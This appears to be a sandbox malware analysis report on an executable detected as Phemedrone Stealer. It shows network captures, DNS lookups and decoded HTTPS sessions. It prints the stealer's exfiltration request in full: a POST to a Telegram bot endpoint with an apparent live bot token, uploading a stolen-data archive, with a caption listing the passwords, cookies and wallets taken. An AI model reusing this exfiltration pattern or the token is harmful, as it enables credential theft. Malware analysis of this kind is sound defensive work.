                                                                                Dec 11, 2024 07:32:01.537040949 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537045002 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537065983 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537072897 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537079096 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537184000 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537193060 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537213087 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537220001 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537240982 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537251949 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537302017 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537311077 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537338972 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537345886 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537378073 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537466049 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537473917 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537497997 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537506104 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537527084 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537538052 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537599087 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537607908 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537616014 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537622929 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537642002 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537647009 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537657022 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537763119 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537775040 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537800074 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537810087 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537859917 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537869930 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537894011 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537908077 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537929058 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537939072 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.538033962 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.538055897 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.538062096 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.538072109 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.579324007 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.792299032 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.843513012 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:03.125957966 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:03.127873898 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:03.127937078 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:03.147859097 CET49700443192.168.2.6149.154.167.220

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 11, 2024 07:31:57.517066956 CET5656253192.168.2.61.1.1.1
                                                                                Dec 11, 2024 07:31:57.655122042 CET53565621.1.1.1192.168.2.6
                                                                                Dec 11, 2024 07:31:59.652595043 CET5373353192.168.2.61.1.1.1
                                                                                Dec 11, 2024 07:31:59.789546013 CET53537331.1.1.1192.168.2.6

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 11, 2024 07:31:57.517066956 CET192.168.2.61.1.1.10x7d08Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                                Dec 11, 2024 07:31:59.652595043 CET192.168.2.61.1.1.10x1acStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 11, 2024 07:31:57.655122042 CET1.1.1.1192.168.2.60x7d08No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                                Dec 11, 2024 07:31:57.655122042 CET1.1.1.1192.168.2.60x7d08No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                                Dec 11, 2024 07:31:57.655122042 CET1.1.1.1192.168.2.60x7d08No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                                Dec 11, 2024 07:31:59.789546013 CET1.1.1.1192.168.2.60x1acNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • get.geojs.io
                                                                                • api.telegram.org

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.649699172.67.70.2334436504C:\Users\user\Desktop\Itaxyhi.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-11 06:31:58 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                                                Host: get.geojs.io
                                                                                Connection: Keep-Alive
                                                                                2024-12-11 06:31:59 UTC1128INHTTP/1.1 200 OK
                                                                                Date: Wed, 11 Dec 2024 06:31:59 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                x-request-id: 5436c8a4eb8fc71da158395f52e5b518-ASH
                                                                                strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                                access-control-allow-origin: *
                                                                                access-control-allow-methods: GET
                                                                                pragma: no-cache
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                geojs-backend: ash-01
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abbK1o2j8GVWuJk5pswdfb6%2FfTLm5A5aCnqItBDkFVMrUv4he5A0dMrR69gZ%2Bxw83wZqpa0yMTfGQMRM5SwXdeNfSU6n4vwG6%2BgSs6Y%2FL2EtxAw0%2F%2Fb70GrpjK9n9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                X-Content-Type-Options: nosniff
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f036f52cd015e68-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1600&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=690&delivery_rate=1752701&cwnd=214&unsent_bytes=0&cid=6ce2b6b970d6630a&ts=461&x=0"
                                                                                2024-12-11 06:31:59 UTC241INData Raw: 31 34 36 0d 0a 7b 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 35 30 33 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 31 34 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22
                                                                                Data Ascii: 146{"area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","continent_code":"NA","region":"New York","latitude":"40.7503","longitude":"-74.0014","accuracy":20,"city":"New York","timezone":"America\/New_York"
                                                                                2024-12-11 06:31:59 UTC92INData Raw: 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d 0a 0d 0a
                                                                                Data Ascii: ,"asn":3356,"ip":"8.46.123.175","organization":"AS3356 LEVEL3","country":"United States"}
                                                                                2024-12-11 06:31:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.649700149.154.167.2204436504C:\Users\user\Desktop\Itaxyhi.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-11 06:32:01 UTC384OUTPOST /bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                Content-Type: multipart/form-data; boundary=----------------------------8dd19839ab01d6d
                                                                                Host: api.telegram.org
                                                                                Content-Length: 697295
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 38 33 39 61 62 30 31 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 38 2e 34 36 2e 31 32 33 2e 31 37 35 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 70 68 65 6d 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 88 f0 ec de ba fa 84 4b fe 5a 41 fb a2 8e 96 7e 5d 67 f7 fe e5 16 fc a4 4a f4 df cb 15 36 72 7c 2d 96 69 8f 42 11 b6 6d 57 e9 ae d2 d9 19 5f 0c df 1a 9a 0e c1 b0 36 fd 1f bb fb 3e f6 4d 14 f7 f2
                                                                                Data Ascii: ------------------------------8dd19839ab01d6dContent-Disposition: form-data; name="document"; filename="[US]8.46.123.175-Phemedrone-Report.phem"Content-Type: application/octet-streamKZA~]gJ6r|-iBmW_6>M
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: d8 d1 6c a5 46 e1 c4 a1 84 36 9c 94 73 12 ca 1e 95 fd 2c ba fe fa a6 47 87 5d 9d bf 76 98 e6 7f 8f 57 48 8d 84 b7 9e fd e1 8b 70 71 97 cb ce b2 a7 cc f0 3d 71 d8 eb 13 0e f0 b4 d7 26 c1 3d 44 55 7f 2b 3d 14 2b 8a 5e 97 8c 62 1f bd 1c 9c 0a 02 96 c6 1b 56 54 7d 19 12 2c ec d4 72 cb d4 7e 96 95 aa b3 51 64 07 29 1a b0 01 0d f6 b9 6c b0 06 2e 4f 6b f5 50 82 06 cf 44 11 32 af 73 59 03 5b 7d e6 65 1d f7 47 e2 53 75 07 b2 41 fb 3b 9e 75 e9 ae 2a 46 82 21 78 e0 bd 23 86 66 f9 7d 7a fc e8 dc b8 ab 58 09 45 3a 0f 7b 52 ab dd ec 12 2e 93 a6 3f 94 0a cc 2b 48 46 f8 87 a6 d3 4a a4 41 2d a8 fe 25 3d d2 91 be 38 26 1f 0a 36 50 12 68 81 e6 f0 a9 33 6d 2a ac 05 62 88 6d db c2 4e 72 d0 4c 42 7d 4d 17 9e 40 de 97 49 03 30 94 cf 76 3f 7d a6 5d aa 5d d0 e6 55 b2 c7 18 cc 4e
                                                                                Data Ascii: lF6s,G]vWHpq=q&=DU+=+^bVT},r~Qd)l.OkPD2sY[}eGSuA;u*F!x#f}zXE:{R.?+HFJA-%=8&6Ph3m*bmNrLB}M@I0v?}]]UN
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: b0 eb 51 46 11 16 0d 1c 06 21 4e 17 c4 18 17 7f e5 4f 46 6c 22 54 71 c1 3b 1f 3f ef 3b a7 ac a4 0a b5 a1 9a a2 54 4f 8f 24 64 f3 4d f2 51 16 61 05 88 1b fc 41 50 04 9b b7 eb 29 70 ed b9 ca 4e c2 db e9 e5 bc e6 a7 00 51 b2 d3 37 e9 f5 59 05 c8 e7 c8 6a 37 55 44 5a c9 22 a5 d1 90 4e 7c 81 6b 20 28 82 ed 1a 52 15 16 22 25 5d 3d e3 ae 5d ae 50 16 ec 75 5b 89 42 62 f3 fe b1 93 38 23 71 19 5c 2a f6 dc 2a 97 af 4e 06 50 9f ea 7c 32 ab 90 d4 1b 7f 7a 3b 53 73 4e cd 1b 2d a3 4b 79 2c d6 15 9e 3d e4 72 18 bd d6 94 0c 9b 7d 79 ba b0 17 b2 2c ca d1 66 e7 21 e0 04 30 35 8d ff 65 37 1c 9a e4 fb 3d 68 37 df 0d 33 ae 52 35 17 9a 2a a0 ea c8 53 5c d6 05 37 45 5e 58 9f cb f8 ee a5 2e 73 9f 1a e3 22 ab 54 37 8f 61 f3 d1 6b b2 09 e5 91 cb bf bc 9c 9c 7e 22 fd ce 0e 9e c3 b9
                                                                                Data Ascii: QF!NOFl"Tq;?;TO$dMQaAP)pNQ7Yj7UDZ"N|k (R"%]=]Pu[Bb8#q\**NP|2z;SsN-Ky,=r}y,f!05e7=h73R5*S\7E^X.s"T7ak~"
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: 43 35 94 db 21 cc 4f 88 dd e8 79 4a 8a 89 37 38 86 b6 0f e8 78 c3 d9 8a 6b be ac e4 8a 9d 3a 97 6e 12 a7 5e a4 27 52 1c 3f c9 99 ef 17 11 ad 1e b4 b9 4c 01 41 81 30 f5 10 44 8a de 5e f7 6a c7 cf ea 78 a6 90 1a 47 17 09 19 58 35 ce 6f 7d 2e 3f d3 f4 c6 27 bb db d1 c9 28 41 cd 94 41 f8 b5 35 24 42 86 21 9d 2d cc c7 86 6e fb 9f d4 4c 5f 65 fa 2d e3 5a d7 af 5f ef 98 a5 ed 1e d2 a3 d2 fc ec dc 0e ff 5d 6b 91 9a 62 4c 4e ad 20 78 ac f4 b5 61 78 25 59 ab d8 25 56 f5 fe af 03 db be 5b ad 7c a9 7f 91 a4 22 8c 34 92 25 3e 6d 50 13 5a bc 21 8a 36 d5 61 87 7e 80 15 7c b9 fc 6e 0c d7 80 73 11 d3 b2 52 d8 98 31 6d 59 91 e0 b2 bf ca 17 e0 18 33 37 ae 7e a7 b7 45 a2 cd d1 5f e1 d7 2b 9c 51 4c 48 f1 0b 14 af f1 06 3e a0 3a 52 fd 27 62 9c 97 82 a2 38 7c 61 49 c8 00 5f 81
                                                                                Data Ascii: C5!OyJ78xk:n^'R?LA0D^jxGX5o}.?'(AA5$B!-nL_e-Z_]kbLN xax%Y%V[|"4%>mPZ!6a~|nsR1mY37~E_+QLH>:R'b8|aI_
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: 64 19 e5 d2 d5 26 bb 80 7d 26 73 7c 5b 73 16 33 99 90 34 33 92 01 c8 f9 61 38 1f e0 1a 80 97 a4 ff f3 9e 71 e9 70 57 1a 23 b7 b1 b7 8d 3b f3 c0 3b 2e 30 28 2b 3e 1d 89 71 7e 33 78 a9 51 e9 3a 3a f5 bf b1 dc 34 73 9f f8 10 a6 4c 9c e4 dd 10 8e 06 54 42 e2 21 89 3b 91 69 01 3f 32 20 9a d5 b5 b0 b2 a7 f1 8b db 45 12 03 2c f8 3b f0 c5 3d 46 82 5b 20 cb 85 13 72 f8 61 55 87 05 62 d4 f2 52 65 da 50 b2 51 7a dc e1 0b ee d8 71 14 00 33 89 ea f9 60 15 8d b8 ed 9f 9b b4 98 b6 7c 26 d2 21 79 82 f3 a8 2b 64 48 c6 8b 94 c0 16 c5 3e b7 04 c7 bc 0d 69 29 e5 25 ce 01 6e 72 68 b8 a7 8d ba d3 1f 97 9a ca e7 10 30 e2 b1 11 ae a1 92 29 9f 2f fe 8f 9a e2 f6 3b 7c bb 84 cf 68 c6 c3 5f 48 ab 95 a3 1f 3d 5f 0f 25 80 3b 69 0a dd 94 48 22 50 0f 27 73 1a 0a 6b e7 45 2f cd a8 c5 3d
                                                                                Data Ascii: d&}&s|[s343a8qpW#;;.0(+>q~3xQ::4sLTB!;i?2 E,;=F[ raUbRePQzq3`|&!y+dH>i)%nrh0)/;|h_H=_%;iH"P'skE/=
                                                                                2024-12-11 06:32:01 UTC145OUTData Raw: e3 07 b7 54 3d f3 d8 2b a5 7b 17 00 dc 35 bc 17 4d 08 7f 24 1c 1e 7e e9 5b bb f3 31 a7 7d 14 bd e9 05 0e 5f 54 62 d5 27 c1 41 e8 ff 0e 2d 1f de 0a ef f8 9a 2c 9a 25 28 13 1b 2c 4b 7f c1 1e 93 90 a4 f5 06 e7 2a bc 12 65 d7 b2 c8 13 4d 4d 28 e2 b0 0f 33 7a 0c f5 5b 53 ab 77 50 3d 15 92 89 ac 52 95 db fa 55 dd 85 bf ed b0 2d 78 c1 19 f9 fb d6 ad 39 6f 9d 87 e9 9e 0c 77 12 8e 11 d6 a2 d8 44 e3 5d da be d7 63 17 bd e5 d3 f2 11 d2 75 61
                                                                                Data Ascii: T=+{5M$~[1}_Tb'A-,%(,K*eMM(3z[SwP=RU-x9owD]cua
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: f8 71 21 6e 65 f9 ee 75 ff db da c6 5a 69 0e 6a db 32 8e 24 46 b1 52 72 15 da 92 e7 6a 92 dd 81 30 c9 4a 45 cf 35 a4 51 ac 53 b0 d2 36 f9 eb 6b 78 00 a3 c3 78 a1 d4 be 2a 6c 44 66 79 4e 21 d9 b4 d1 dc 76 00 73 a1 ec 0a 39 61 dd df be fe a2 e9 68 31 18 75 90 d2 4c c9 ec 5e b6 1a 8f b7 5e c5 13 08 77 f5 68 98 f7 55 91 71 06 54 48 de 47 cf 77 94 e9 de 27 cd b9 6b 00 c1 5d 1a 91 dc 35 f7 81 ec 24 c8 cf 08 e6 e8 2b 71 80 ba 8d d2 0f 3c 68 2d fe 49 4f c8 0f e4 72 01 cc 2e 93 2f 3e e5 51 0f e1 5a 28 74 aa 24 3e 9f 3e 1b fe ef 87 e1 ba 2f 74 3f ca 39 a4 ed 11 27 c8 fc 2c f3 33 41 f7 f3 9a dc e7 de 1e 59 a6 81 a4 96 12 d2 69 2e 0e eb 6e 8b 89 5b 6f a9 9a 74 d0 a9 07 c3 73 2d 9a b0 b1 a6 d5 1c 83 d8 70 d3 ca 6a cf bc 6d 78 1b 9b 50 0a 3b 79 70 34 78 72 2b 7f 75 4d
                                                                                Data Ascii: q!neuZij2$FRrj0JE5QS6kxx*lDfyN!vs9ah1uL^^whUqTHGw'k]5$+q<h-IOr./>QZ(t$>>/t?9',3AYi.n[ots-pjmxP;yp4xr+uM
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: 5b 11 d2 ca c4 0e cd ad 81 18 85 43 14 a7 c8 74 3b 7b 13 ad c5 ef fb 55 b9 21 c0 d9 41 8f 70 29 15 f6 7a 59 07 0a b1 da 0c ef 56 f2 d5 83 78 c3 ac 72 9a 98 53 52 dc 07 85 3d c0 34 b6 03 df 33 a1 34 50 92 db 37 23 84 c6 f7 f0 80 af ae 95 34 42 63 71 2d 98 fe 17 90 c0 f7 69 6b a5 ab 45 d5 16 c2 ac bf dc 69 2f 01 af 26 0e 2f c0 5d fb 21 d4 41 08 28 21 c0 34 1d b1 35 7b 7c 03 c7 b3 23 89 83 86 67 93 55 41 db 4f cb 83 a4 d8 d3 97 9d 2c a2 cb 72 72 f0 ef c1 c8 cb fa bc ac e0 90 c2 78 1e d3 cf 40 a4 12 4a 32 df df d5 2d 0b 99 2a a6 06 55 5c 30 ab 38 b8 71 07 fe f7 f6 b8 41 7a 64 f1 f4 20 c5 6b a7 9e 19 ff ef c9 1c 6a c0 3c 32 b9 42 27 1b 80 d5 50 57 12 2e 34 42 b7 e6 11 97 f7 92 04 02 23 69 c3 22 c2 95 f2 88 7a ba e7 f7 07 3a 3e 26 09 f8 52 46 eb fb a1 7a 79 c6
                                                                                Data Ascii: [Ct;{U!Ap)zYVxrSR=434P7#4Bcq-ikEi/&/]!A(!45{|#gUAO,rrx@J2-*U\08qAzd kj<2B'PW.4B#i"z:>&RFzy
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: bb 73 41 7d 79 77 32 da fa 9e 95 e2 b9 7b ff 60 cd c5 4c 98 5d 39 85 4a a1 68 d7 df 9d 60 3d 98 ff 52 63 30 92 94 62 b5 ea f4 05 35 c0 e6 54 6f c1 05 b0 f3 d0 80 16 b5 82 52 70 f3 b2 a9 c5 e1 4f eb be 68 69 b8 2a 44 79 2f 08 af a3 d0 06 92 d7 b5 45 f2 39 12 1d 02 4b 79 de 7a 02 1e a9 1a 69 62 d0 9d 49 2a 88 3a d7 27 dc 03 b2 3e 3f b6 cc d6 7e 18 37 1a d3 cb ae 44 84 cb 5f 68 46 5e 99 91 04 37 96 a1 67 63 90 9c 55 41 dc 56 b1 fc fd d1 f0 50 af d2 3b cc e6 ed 5f 82 b1 e2 27 48 90 dd ca 5f f7 16 f1 d7 d0 b7 26 85 09 ad 7f 73 05 6b 93 94 12 63 4e a8 aa 51 94 6b fe 24 6a 82 ac 9c f6 91 70 fe 9a 00 36 0b dc 4a 0e 1c 54 53 fe cc 6d a5 ca 98 00 64 c9 46 5f 8c a3 2e 1a 2a d6 35 90 74 b5 f3 8c 2b 69 29 8d 04 a0 b6 d4 1f 11 a6 f2 00 c2 f6 a4 3a 10 96 ca ba 2c fe d9
                                                                                Data Ascii: sA}yw2{`L]9Jh`=Rc0b5ToRpOhi*Dy/E9KyzibI*:'>?~7D_hF^7gcUAVP;_'H_&skcNQk$jp6JTSmdF_.*5t+i):,
                                                                                2024-12-11 06:32:01 UTC16355OUTData Raw: 96 06 b0 e1 c5 fa c3 e8 5b 3c ca 12 9d 64 ff b9 2b 61 8c 7f c3 15 63 90 37 38 c9 3f cc bd 0d ee d7 bc 20 cb 1e 0e 35 36 b9 72 ce 7c 94 6d 17 6d ed b8 53 6b 40 ba fe ad 31 97 23 b6 92 f1 21 12 83 83 86 05 5b cb dc 8c 84 02 de a5 97 79 32 7e 84 c1 2f 5c bc 98 7a e4 eb d9 c1 4c de 11 67 98 9c 7c 0c 39 a2 0a 6a c0 b6 5d 8f 64 88 81 df 55 46 0b b8 34 a4 8b ab 9a 1a 4b 06 bc 16 86 5f 9c f3 79 7e e5 56 2f 10 c8 d3 cd ab 5e e5 ad 6b 8f 1c a4 93 5c 58 ff ec 9d 39 4a 61 72 76 85 21 68 ac ec e3 8b d6 0f 7f f9 89 ae 2e 9b 92 cb 9c b2 5f 8b 2a d9 e4 d1 96 3f 08 c1 2a ea 26 8b 61 4b da 8e a4 23 10 10 8e 24 1f 6e 9e 5b 9f 50 77 6f ae 66 3e 2c 8b 62 40 fd 21 66 4e 6e 89 14 97 58 3f ba 6b ab c5 71 2e 45 dc 1c af 17 63 a1 fa 25 9e f2 41 49 75 39 62 38 0e 30 8f 0a 37 8a fb
                                                                                Data Ascii: [<d+ac78? 56r|mmSk@1#![y2~/\zLg|9j]dUF4K_y~V/^k\X9Jarv!h._*?*&aK#$n[Pwof>,b@!fNnX?kq.Ec%AIu9b807
                                                                                2024-12-11 06:32:01 UTC25INHTTP/1.1 100 Continue
                                                                                2024-12-11 06:32:03 UTC1256INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Wed, 11 Dec 2024 06:32:02 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 868
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":371,"from":{"id":7105333862,"is_bot":true,"first_name":"log","username":"logformy4mybot"},"chat":{"id":7235624286,"first_name":"btcat","username":"indeep12","type":"private"},"date":1733898722,"document":{"file_name":"[US]8.46.123.175-Phemedrone-Report.phem","file_id":"BQACAgIAAxkDAAIBc2dZMeJivmmfWFuyb2nSlxcrdfZ3AAI3YgACPybJSvJQOZwbcwABTjYE","file_unique_id":"AgADN2IAAj8myUo","file_size":696528},"caption":"Phemedrone Stealer Report | by @webster480 & @TheDyer\n\n - IP: 8.46.123.175 (United States)\n - Tag: Default (Itaxyhi)\n - Passwords: 0\n - Cookies: 2\n - Wallets: 0\n\n\n\n\n@freakcodingspot","caption_entities":[{"offset":0,"length":25,"type":"bold"},{"offset":31,"length":11,"type":"mention"},{"offset":45,"length":8,"type":"mention"},{"offset":55,"length":106,"type":"pre"},{"offset":165,"length":16,"type":"mention"}]}}


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:01:31:55
                                                                                Start date:11/12/2024
                                                                                Path:C:\Users\user\Desktop\Itaxyhi.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\Itaxyhi.exe"
                                                                                Imagebase:0x810000
                                                                                File size:119'296 bytes
                                                                                MD5 hash:78C586522F986994AA77C466C9D678A8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:14.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:27.8%
                                                                                  Total number of Nodes:18
                                                                                  Total number of Limit Nodes:1
